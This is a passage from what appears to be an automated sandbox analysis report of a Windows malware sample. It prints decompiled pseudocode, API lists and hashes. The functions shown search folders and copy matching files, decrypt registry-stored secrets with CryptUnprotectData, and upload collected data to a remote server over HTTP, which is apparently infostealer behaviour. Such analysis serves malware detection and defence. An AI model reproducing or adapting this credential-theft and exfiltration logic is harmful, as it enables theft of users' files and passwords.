				}
				return _t23;
			}

0x0040f4a0
0x0040f4a1
0x0040f4b9
0x0040f4bc
0x0040f4bf
0x0040f4c7
0x0040f4cd
0x0040f4d8
0x0040f4e6
0x0040f4fd
0x0040f514
0x0040f52b
0x0040f542
0x0040f559
0x0040f570
0x0040f587
0x0040f59e
0x0040f5b5
0x0040f5cc
0x0040f5e3
0x0040f5fa
0x0040f611
0x0040f628
0x0040f63f
0x0040f656
0x0040f66d
0x0040f684
0x0040f69b
0x0040f6ac
0x0040f6ac
0x0040f6c3
0x0040f6d4
0x0040f6e5
0x0040f6ea
0x0040f6f6
0x0040f701
0x0040f706
0x0040f70e
0x0040f71d
0x0040f71d
0x0040f722
0x0040f729
0x0040f73e
0x0040f74f
0x0040f74f
0x0040f754
0x0040f75b
0x0040f76a
0x0040f76a
0x0040f76f
0x0040f776
0x0040f785
0x0040f785
0x0040f78a
0x0040f791
0x0040f79a
0x0040f7a0
0x00000000
0x0040f7a0
0x0040f7a6

APIs

GetProcAddress.KERNEL32 ref: 0040F4F1
GetProcAddress.KERNEL32 ref: 0040F508
GetProcAddress.KERNEL32 ref: 0040F51F
GetProcAddress.KERNEL32 ref: 0040F536
GetProcAddress.KERNEL32 ref: 0040F54D
GetProcAddress.KERNEL32 ref: 0040F564
GetProcAddress.KERNEL32 ref: 0040F57B
GetProcAddress.KERNEL32 ref: 0040F592
GetProcAddress.KERNEL32 ref: 0040F5A9
GetProcAddress.KERNEL32 ref: 0040F5C0
GetProcAddress.KERNEL32 ref: 0040F5D7
GetProcAddress.KERNEL32 ref: 0040F5EE
GetProcAddress.KERNEL32 ref: 0040F605
GetProcAddress.KERNEL32 ref: 0040F61C
GetProcAddress.KERNEL32 ref: 0040F633
GetProcAddress.KERNEL32 ref: 0040F64A
GetProcAddress.KERNEL32 ref: 0040F661
GetProcAddress.KERNEL32 ref: 0040F678
GetProcAddress.KERNEL32 ref: 0040F68F
GetProcAddress.KERNEL32 ref: 0040F6A6
LoadLibraryA.KERNEL32(1852), ref: 0040F6B7
LoadLibraryA.KERNEL32 ref: 0040F6C8
LoadLibraryA.KERNEL32 ref: 0040F6D9
LoadLibraryA.KERNEL32 ref: 0040F6EA
LoadLibraryA.KERNEL32 ref: 0040F6FB
GetProcAddress.KERNEL32(76170000), ref: 0040F717
GetProcAddress.KERNEL32(76130000), ref: 0040F732
GetProcAddress.KERNEL32(?,0040DC8F), ref: 0040F749
GetProcAddress.KERNEL32(762B0000), ref: 0040F764
GetProcAddress.KERNEL32(76B00000), ref: 0040F77F
GetProcAddress.KERNEL32(77090000), ref: 0040F79A

Strings

1852, xrefs: 0040F4A5

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: AddressProc$LibraryLoad
String ID: 1852
API String ID: 2238633743-692938694
Opcode ID: 75126643206287963779a249aa1dac76500ecf7eeacaa857f48edae8b1e95cf6
Instruction ID: c042832d83ce75c1ee96e177d767845db6d521441a1a470865e2878029433866
Opcode Fuzzy Hash: 75126643206287963779a249aa1dac76500ecf7eeacaa857f48edae8b1e95cf6
Instruction Fuzzy Hash: 54811775401A40EFDB029F61FC499D8FBA7F7983213A8F527E94B82670D7364891AF90

Uniqueness

Uniqueness Score: -1.00%

Function 0040B202 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 219
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 21%

			E0040B202(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, char _a36) {
				CHAR* _v8;
				char* _v12;
				void* _v16;
				char _v20;
				char _v24;
				char _v36;
				char _v300;
				char _v564;
				char _v828;
				char _v1092;
				struct _WIN32_FIND_DATAA _v1412;
				char _v1676;
				char _v2676;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t87;
				int _t101;
				void* _t111;
				int _t116;
				void* _t128;
				void* _t132;
				void* _t158;
				void* _t159;
				void* _t169;
				void* _t174;
				CHAR* _t186;
				void* _t190;
				void* _t192;
				void* _t194;
				void* _t195;
				void* _t197;
				void* _t198;
				void* _t199;

				_t174 = __edx;
				wsprintfA( &_v1092, "%s\\*", _a12);
				_t87 = FindFirstFileA( &_v1092,  &_v1412); // executed
				_v16 = _t87;
				_v12 =  &_v300;
				memset(_v12, 0, 0x104 << 0);
				_t192 = _t190 + 0x18;
				if(_v16 == 0xffffffff) {
					L20:
					return E004016CC( &_a36);
				}
				_v12 =  &_v300;
				do {
					memset(_v12, 0, 0x104 << 0);
					_t192 = _t192 + 0xc;
					 *0x61575c( &_v300,  &(_v1412.cFileName));
					_push(0x411bf0);
					_push( &_v300);
					if( *0x615784() == 0) {
						goto L18;
					}
					_push(0x411bf4);
					_push( &_v300);
					if( *0x615784() == 0) {
						goto L18;
					}
					_t186 = "%s\\%s";
					wsprintfA( &_v564, _t186, _a12,  &_v300);
					_v8 =  &_v2676;
					memset(_v8, 0, 0x3e8 << 0);
					_t194 = _t192 + 0x1c;
					_t168 = 0;
					_t159 = 0;
					if(_a32 != 0 && PathMatchSpecA( &_v300,  *0x615498) != 0) {
						 *0x61577c(0); // executed
						E0040B127( &_v564,  &_v2676); // executed
						 *0x615764(); // executed
						_v8 =  &_v564;
						memset(_v8, 0, 0x104 << 0);
						_t194 = _t194 + 0xc;
						 *0x61575c( &_v564,  &_v2676);
						_t158 =  *0x61567c( &_v300);
						_t168 =  &_v300;
						 *((char*)(_t158 +  &_v300 - 4)) = 0;
					}
					_t111 =  *0x615784(_a4, 0x411be1);
					_push( &_v300);
					if(_t111 != 0) {
						wsprintfA( &_v828, _t186, _a4);
						_t192 = _t194 + 0x10;
					} else {
						_push(_a8);
						_push( *0x61543c);
						wsprintfA( &_v828, "%s\\%s\\%s");
						_t192 = _t194 + 0x14;
					}
					_t116 = PathMatchSpecA( &_v564, _a16);
					_t207 = _t116;
					if(_t116 == 0) {
						L15:
						if(_a28 != _t159 && (_v1412.dwFileAttributes & 0x00000010) != 0) {
							_t195 = _t192 - 0x50;
							E004016EB( &_a36, _t195);
							_push(_a32);
							_push(_a28);
							_push(_a24);
							_push(_a20);
							_push(_a16);
							_push( &_v564);
							_push(_a8);
							_push( &_v828); // executed
							E0040B202(_t174); // executed
							_t192 = _t195 + 0x70;
						}
					} else {
						wsprintfA( &_v1676, "%s%s",  *0x6153e4,  &_v300);
						CopyFileA( &_v564,  &_v1676, 1); // executed
						_t128 = E0040F338(_t168,  &_v1676); // executed
						_pop(_t169);
						_a24 = _a24 + E004102B0(_t128, _t174, 0x3e8, _t159);
						_t197 = _t192 + 0x10 - 0xc;
						E004100ED(_t197, _t207,  &_v1676);
						_t132 = E00405394( &_v24,  &_v20); // executed
						_t192 = _t197 + 0xc;
						_t208 = _t132;
						if(_t132 != 0) {
							_push(_v20);
							_push(_v24);
							_t198 = _t192 - 0xc;
							E004100ED(_t198, _t208,  &_v828);
							_t199 = _t198 - 0x50;
							E004016EB( &_a36, _t199);
							_push( &_v36); // executed
							E00403F95(_t169, _t208); // executed
							_t192 = _t199 + 0x68;
							E00401859(_v36);
						}
						DeleteFileA( &_v1676); // executed
						if(_a24 > _a20) {
							break;
						} else {
							_t159 = 0;
							goto L15;
						}
					}
					L18:
					_t101 = FindNextFileA(_v16,  &_v1412); // executed
				} while (_t101 != 0);
				FindClose(_v16);
				goto L20;
			}

0x0040b202
0x0040b21d
0x0040b234
0x0040b23a
0x0040b243
0x0040b250
0x0040b250
0x0040b256
0x0040b4f8
0x0040b504
0x0040b504
0x0040b262
0x0040b265
0x0040b26f
0x0040b26f
0x0040b27f
0x0040b285
0x0040b290
0x0040b299
0x00000000
0x00000000
0x0040b29f
0x0040b2aa
0x0040b2b3
0x00000000
0x00000000
0x0040b2c3
0x0040b2d0
0x0040b2df
0x0040b2ec
0x0040b2ec
0x0040b2ec
0x0040b2ee
0x0040b2f3
0x0040b30d
0x0040b321
0x0040b328
0x0040b334
0x0040b341
0x0040b341
0x0040b351
0x0040b35e
0x0040b364
0x0040b36a
0x0040b36a
0x0040b376
0x0040b384
0x0040b38b
0x0040b3ac
0x0040b3b2
0x0040b38d
0x0040b38d
0x0040b390
0x0040b39c
0x0040b3a2
0x0040b3a2
0x0040b3bf
0x0040b3c5
0x0040b3c7
0x0040b494
0x0040b497
0x0040b4a2
0x0040b4aa
0x0040b4af
0x0040b4b8
0x0040b4bb
0x0040b4be
0x0040b4c1
0x0040b4c4
0x0040b4c5
0x0040b4ce
0x0040b4cf
0x0040b4d4
0x0040b4d4
0x0040b3cd
0x0040b3e6
0x0040b3ff
0x0040b40c
0x0040b411
0x0040b41f
0x0040b422
0x0040b42e
0x0040b439
0x0040b43e
0x0040b441
0x0040b443
0x0040b445
0x0040b44e
0x0040b451
0x0040b457
0x0040b45c
0x0040b464
0x0040b46c
0x0040b46d
0x0040b475
0x0040b478
0x0040b478
0x0040b484
0x0040b490
0x00000000
0x0040b492
0x0040b492
0x00000000
0x0040b492
0x0040b490
0x0040b4d7
0x0040b4e1
0x0040b4e7
0x0040b4f2
0x00000000

APIs

wsprintfA.USER32 ref: 0040B21D
FindFirstFileA.KERNEL32(?,?), ref: 0040B234
lstrcat.KERNEL32(?,?), ref: 0040B27F
StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040B291
StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040B2AB
wsprintfA.USER32 ref: 0040B2D0
PathMatchSpecA.SHLWAPI(?), ref: 0040B302
CoInitialize.OLE32(00000000), ref: 0040B30D

Part of subcall function 0040B127: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 0040B186
Part of subcall function 0040B127: lstrcpyn.KERNEL32(0040B326,?,00000104), ref: 0040B1F5

lstrcat.KERNEL32(?,?), ref: 0040B351
lstrlen.KERNEL32(?), ref: 0040B35E
StrCmpCA.SHLWAPI(?,00411BE1), ref: 0040B376
wsprintfA.USER32 ref: 0040B39C
wsprintfA.USER32 ref: 0040B3AC
PathMatchSpecA.SHLWAPI(?,0040B608), ref: 0040B3BF
wsprintfA.USER32 ref: 0040B3E6
CopyFileA.KERNEL32(?,?,00000001), ref: 0040B3FF
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040B41A
DeleteFileA.KERNEL32(?,?,?,?,?,?,00000000), ref: 0040B484
FindNextFileA.KERNELBASE(000000FF,?), ref: 0040B4E1
FindClose.KERNEL32(000000FF), ref: 0040B4F2

Strings

%s\%s, xrefs: 0040B2C3, 0040B2CE, 0040B3AA
%s%s, xrefs: 0040B3E0
%s\%s\%s, xrefs: 0040B396
%s\*, xrefs: 0040B217

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: wsprintf$File$Find$MatchPathSpeclstrcat$ByteCharCloseCopyDeleteFirstInitializeMultiNextUnothrow_t@std@@@Wide__ehfuncinfo$??2@lstrcpynlstrlen
String ID: %s%s$%s\%s$%s\%s\%s$%s\*
API String ID: 293453756-2388001722
Opcode ID: 6fda56696a253a11b7fc9776bf959214014c94fbdf33b8bf02a040440b220b6d
Instruction ID: bc8e167ea55a080e069c39d1a55a0b7401cf6f7cc616c2d50a62ffe8d8601d00
Opcode Fuzzy Hash: 6fda56696a253a11b7fc9776bf959214014c94fbdf33b8bf02a040440b220b6d
Instruction Fuzzy Hash: 56811A7190021DEFCF10DFA0DD89ADE7BBDEB48314F0445A6F909A2190EB399B958F94

Uniqueness

Uniqueness Score: -1.00%

Function 0040BF33 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 157
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0040BF4E
FindFirstFileA.KERNEL32(?,?), ref: 0040BF65
StrCmpCA.SHLWAPI(?,00411BF0), ref: 0040BF83
StrCmpCA.SHLWAPI(?,00411BF4), ref: 0040BF9D
wsprintfA.USER32 ref: 0040BFC2
StrCmpCA.SHLWAPI(00411BE1,00411BE1), ref: 0040BFD3
wsprintfA.USER32 ref: 0040BFF0
wsprintfA.USER32 ref: 0040C000
PathMatchSpecA.SHLWAPI(?,?), ref: 0040C013
lstrcat.KERNEL32(?), ref: 0040C043
lstrcat.KERNEL32(?,00411BE4), ref: 0040C056
lstrcat.KERNEL32(?,?), ref: 0040C066
lstrcat.KERNEL32(?,00411BE4), ref: 0040C074
lstrcat.KERNEL32(?,?), ref: 0040C088
CopyFileA.KERNEL32(?,?,00000001), ref: 0040C09E
DeleteFileA.KERNEL32(?), ref: 0040C106
FindNextFileA.KERNEL32(?,?), ref: 0040C13F
FindClose.KERNEL32(?), ref: 0040C150

Strings

%s\%s, xrefs: 0040BFB5, 0040BFC0, 0040BFFE
%s\*, xrefs: 0040BF48

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
String ID: %s\%s$%s\*
API String ID: 2178766154-2848263008
Opcode ID: d8c82ab49e89e5f6d7934d378065856e930b248b773b32179d4070023baf5377
Instruction ID: 99cac21fee110afba94fbc31f59fd252ae131031cc3edab23e7c19d86a18b3f9
Opcode Fuzzy Hash: d8c82ab49e89e5f6d7934d378065856e930b248b773b32179d4070023baf5377
Instruction Fuzzy Hash: 5951097290011DEBCF10ABA1DD49ADEBB7DEB44304F0445A6B909E2160EB35AB58CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0040C3A0 Relevance: 27.1, APIs: 18, Instructions: 137
stringmemoryregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E0040C3A0(intOrPtr _a4, void** _a8) {
				int _v8;
				int _v12;
				int _v16;
				int* _v20;
				void* _v24;
				short* _v28;
				int _v32;
				char* _v36;
				char _v40;
				char _v1063;
				char _v1064;
				char _v2088;
				char _v3112;
				long _t52;
				long _t63;
				void* _t91;
				void* _t95;

				_v20 = 0;
				_v12 = 0xff;
				_v8 = 3;
				_v2088 = 0;
				_t52 = RegEnumValueA( *_a8, 0,  &_v2088,  &_v12, 0,  &_v8,  &_v1064,  &_v16); // executed
				if(_t52 != 0) {
					return _t52;
				}
				do {
					 *0x61575c(_a4,  &_v2088);
					 *0x61575c(_a4, ": ");
					if(_v8 == 3) {
						if(StrStrA( &_v2088,  *0x6154b4) == 0) {
							wsprintfA( &_v1064, "%S",  &_v1064);
							_t95 = _t95 + 0xc;
							 *0x61575c(_a4,  &_v1064);
						} else {
							_v24 = RtlAllocateHeap(GetProcessHeap(), 8, 0x400);
							_v36 =  &_v1063;
							_push( &_v32);
							_push(1);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push( &_v40);
							_v40 = _v16 - 1;
							if( *0x61568c() == 0) {
								_t91 = 0x411be1;
							} else {
								_t91 = _v24;
								WideCharToMultiByte(0, 0, _v28, _v32, _t91, 0x400, 0, 0);
								LocalFree(_v28);
							}
							 *0x6157e8( &_v3112, _t91);
							HeapFree(GetProcessHeap(), 0, _t91);
							 *0x61575c(_a4,  &_v3112);
							 *0x6157e8( &_v3112, 0x411be1);
						}
					}
					 *0x61575c(_a4, "\n");
					_v20 =  &(_v20[0]);
					_v12 = 0x400;
					_v16 = 0x400;
					_t63 = RegEnumValueA( *_a8, _v20,  &_v2088,  &_v12, 0,  &_v8,  &_v1064,  &_v16); // executed
				} while (_t63 == 0);
				return _t63;
			}

0x0040c3cd
0x0040c3d0
0x0040c3d7
0x0040c3de
0x0040c3e4
0x0040c3ec
0x0040c54f
0x0040c54f
0x0040c3f9
0x0040c403
0x0040c411
0x0040c41b
0x0040c436
0x0040c4ea
0x0040c4f0
0x0040c4fd
0x0040c43c
0x0040c44f
0x0040c458
0x0040c45e
0x0040c45f
0x0040c461
0x0040c462
0x0040c463
0x0040c464
0x0040c469
0x0040c46a
0x0040c475
0x0040c497
0x0040c477
0x0040c477
0x0040c486
0x0040c48f
0x0040c48f
0x0040c4a4
0x0040c4b3
0x0040c4c3
0x0040c4d5
0x0040c4d5
0x0040c436
0x0040c50b
0x0040c511
0x0040c537
0x0040c53a
0x0040c53d
0x0040c543
0x00000000

APIs

RegEnumValueA.KERNEL32(?,00000000,?,?,00000000,0040D695,?,?,00000000), ref: 0040C3E4
lstrcat.KERNEL32(000000FF,?), ref: 0040C403
lstrcat.KERNEL32(000000FF,004140B4), ref: 0040C411
StrStrA.SHLWAPI(?), ref: 0040C42E
GetProcessHeap.KERNEL32(00000008,00000400), ref: 0040C442
RtlAllocateHeap.NTDLL(00000000), ref: 0040C449
CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 0040C46D
WideCharToMultiByte.KERNEL32(00000000,00000000,0040D695,?,?,00000400,00000000,00000000), ref: 0040C486
LocalFree.KERNEL32(0040D695), ref: 0040C48F
lstrcpy.KERNEL32(?,00411BE1), ref: 0040C4A4
GetProcessHeap.KERNEL32(00000000,00411BE1), ref: 0040C4AC
HeapFree.KERNEL32(00000000), ref: 0040C4B3
lstrcat.KERNEL32(000000FF,?), ref: 0040C4C3
lstrcpy.KERNEL32(?,00411BE1), ref: 0040C4D5
wsprintfA.USER32 ref: 0040C4EA
lstrcat.KERNEL32(000000FF,?), ref: 0040C4FD
lstrcat.KERNEL32(000000FF,00414044), ref: 0040C50B
RegEnumValueA.KERNEL32(?,00000000,?,000000FF,00000000,00000003,?,?), ref: 0040C53D

Memory Dump Source

Source File: 00000000.00000002.417733641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.417733641.000000000041D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000424000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000004E5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.417733641.0000000000627000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_un78exGoa4.jbxd

Similarity

API ID: lstrcat$Heap$EnumFreeProcessValuelstrcpy$AllocateByteCharCryptDataLocalMultiUnprotectWidewsprintf
String ID:
API String ID: 4067757933-0
Opcode ID: d1591c61e2527343690155916c1ffe7384f7d941151ef21b48d67ba60e418070
Instruction ID: 5edcf13843c88bef7b98ac34a187226c13ecb7453477b619b91340fc0fd7163a
Opcode Fuzzy Hash: d1591c61e2527343690155916c1ffe7384f7d941151ef21b48d67ba60e418070
Instruction Fuzzy Hash: B351FAB2900218FFDB119F90DC89EEEBBBDFB48300F149162F606E2160D7349A45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040397F Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 379
networkstringfileCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040397F(void* __ecx, void* __eflags, intOrPtr* _a4, char _a8, char _a20, char _a32) {
				char _v16;
				char _v28;
				long _v32;
				void* _v36;
				char _v40;
				char _v44;
				char _v56;
				char _v68;
				void* _v72;
				long _v84;
				char _v96;
				char* _v108;
				char _v120;
				char* _v136;
				short _v156;
				char* _v164;
				intOrPtr _v176;
				void _v180;
				char _v240;
				void _v2240;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t174;
				void* _t181;
				void* _t185;
				void* _t213;
				void* _t254;
				void* _t259;
				long _t346;
				long _t351;
				void* _t363;
				signed int _t365;
				void* _t367;
				void* _t454;
				void* _t455;

				_t461 = __eflags;
				E0041011F( &_a8, __ecx, _t455 - 0xc, __eflags);
				_push( &_v240); // executed
				_t174 = E00403907(); // executed
				_t365 = 0xf;
				memcpy( &_v180, _t174, _t365 << 2);
				E004100ED(_a4, _t461, 0x411be1);
				E004100ED( &_v96, _t461, 0x411be1);
				E004100ED( &_v16, _t461, 0x411be1);
				E004100ED( &_v68, _t461, 0x411be1);
				E004100ED( &_v108, _t461, 0x411be1);
				_t181 = InternetOpenA(0, 1, 0, 0, 0); // executed
				_push( *0x6153c0);
				_v72 = _t181;
				_push(_v176);
				_v32 = 0;
				if( *0x615784() == 0) {
					_v32 = 1;
				}
				_t463 = _v72;
				if(_v72 != 0) {
					_t213 = E0040EEA9(0x411be1,  &_v56, _t463, 0x14);
					_pop(0);
					E0041018C(E004101C6( &_v96, 0, _t213,  &_v84, _t463), 0,  &_v96);
					E00401859(_v84);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t463, "------"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E004101C6( &_v68, 0,  &_v96,  &_v56, _t463), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t463, "--"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E00410208( &_v68, 0,  &_v56, _t463, "\r\n"), 0,  &_v68);
					E00401859(_v56);
					E0041018C(E004101C6(E00410208( &_v108, 0,  &_v28, _t463,  *0x615070), 0,  &_v96,  &_v84, _t463), 0,  &_v108);
					E00401859(_v84);
					E00401859(_v28);
					_t254 = InternetConnectA(_v72, _v164, _v156, 0, 0, 3, 0, 0); // executed
					_v36 = _t254;
					if(_t254 != 0) {
						asm("sbb eax, eax");
						_t259 = HttpOpenRequestA(_v36,  *0x6153dc, _v136,  *0x615208, 0, 0, ( ~_v32 & 0x00800000) + 0x400100, 0); // executed
						_v32 = _t259;
						_t465 = _t259;
						if(_t259 != 0) {
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v56, _t465,  *0x61523c), 0,  &_v16);
							E00401859(_v56);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465,  *0x61539c), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_a20,  &_v28, _t465), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "------"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_v96,  &_v28, _t465), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v56, _t465,  *0x61523c), 0,  &_v16);
							E00401859(_v56);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465,  *0x615444), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E00410208( &_v16, 0,  &_v28, _t465, "\"\r\n\r\n"), 0,  &_v16);
							E00401859(_v28);
							E0041018C(E004101C6( &_v16, 0,  &_a32,  &_v28, _t465), 0,  &_v16);
							E00401859(_v28);
							E004100ED( &_v84, _t465, 0x411be1);
							E0041018C(E004101C6(E004101C6( &_v84, 0,  &_v16,  &_v56, _t465), 0,  &_v68,  &_v28, _t465), 0,  &_v84);
							E00401859(_v28);
							E00401859(_v56);
							_t346 =  *0x61567c( *0x61567c(_v84));
							_t363 = _v32;
							HttpSendRequestA(_t363, _v108, _t346, _v108, _v84); // executed
							while(InternetReadFile(_t363,  &_v2240, 0x7cf,  &_v32) != 0) {
								_t351 = _v32;
								__eflags = _t351;
								if(__eflags != 0) {
									 *((char*)(_t454 + _t351 - 0x8bc)) = 0;
									E0041018C(E00410208(_a4, 0,  &_v120, __eflags,  &_v2240), 0, _a4);
									E00401859(_v120);
									continue;
								}
								break;
							}
							InternetCloseHandle(_t363); // executed
							E00401859(_v84);
						}
						InternetCloseHandle(_v36);
					}
				}
				InternetCloseHandle(_v72);
				_t185 = E00405430( &_v40, 0,  &_v44,  *_a4);
				_pop(_t367);
				_t467 = _t185;
				if(_t185 != 0) {
					E00410148(_t367, _a4, 0x411be1);
					E0041018C(E00410208(_a4, _t367,  &_v120, _t467, _v40), _t367, _a4);
					E00401859(_v120);
				}
				_v36 =  &_v40;
				memset(_v36, 0, 4 << 0);
				_v36 =  &_v44;
				memset(_v36, 0, 4 << 0);
				E00401859(_v108);
				E00401859(_v68);
				E00401859(_v16);
				E00401859(_v96);
				E00401859(_a8);
				E00401859(_a20);
				E00401859(_a32);
				return _a4;
			}

0x0040397f
0x00403993
0x0040399e
0x0040399f
0x004039a9
0x004039b2
0x004039bd
0x004039c6
0x004039cf
0x004039d8
0x004039e1
0x004039f0
0x004039f6
0x004039fc
0x004039ff
0x00403a05
0x00403a10
0x00403a12
0x00403a12
0x00403a15
0x00403a18
0x00403a23
0x00403a2a
0x00403a39
0x00403a41
0x00403a49
0x00403a61
0x00403a69
0x00403a81
0x00403a89
0x00403a9f
0x00403aa7
0x00403abf
0x00403ac7
0x00403adf
0x00403ae7
0x00403b08
0x00403b10
0x00403b18
0x00403b34
0x00403b3a
0x00403b3f
0x00403b4b
0x00403b6f
0x00403b75
0x00403b78
0x00403b7a
0x00403b93
0x00403b9b
0x00403bae
0x00403bb6
0x00403bce
0x00403bd6
0x00403bef
0x00403bf7
0x00403c10
0x00403c18
0x00403c30
0x00403c38
0x00403c4e
0x00403c56
0x00403c6e
0x00403c76
0x00403c8e
0x00403c96
0x00403cac
0x00403cb4
0x00403ccc
0x00403cd4
0x00403ced
0x00403cf5
0x00403d0e
0x00403d16
0x00403d2e
0x00403d36
0x00403d4c
0x00403d54
0x00403d5d
0x00403d7e
0x00403d86
0x00403d8e
0x00403da3
0x00403da9
0x00403db1
0x00403def
0x00403dbe
0x00403dc1
0x00403dc3
0x00403dc5
0x00403de2
0x00403dea
0x00000000
0x00403dea
0x00000000
0x00403dc3
0x00403e07
0x00403e10
0x00403e10
0x00403e18
0x00403e18
0x00403b3f
0x00403e21
0x00403e32
0x00403e37
0x00403e38
0x00403e3a
0x00403e44
0x00403e5a
0x00403e62
0x00403e62
0x00403e6a
0x00403e77
0x00403e7c
0x00403e89
0x00403e8e
0x00403e96
0x00403e9e
0x00403ea6
0x00403eae
0x00403eb6
0x00403ebe
0x00403eca

APIs

Part of subcall function 0041011F: lstrcpy.KERNEL32(00000000,?), ref: 0041013E

Part of subcall function 00403907: malloc.MSVCRT ref: 00403939
Part of subcall function 00403907: malloc.MSVCRT ref: 0040393F
Part of subcall function 00403907: malloc.MSVCRT ref: 00403945
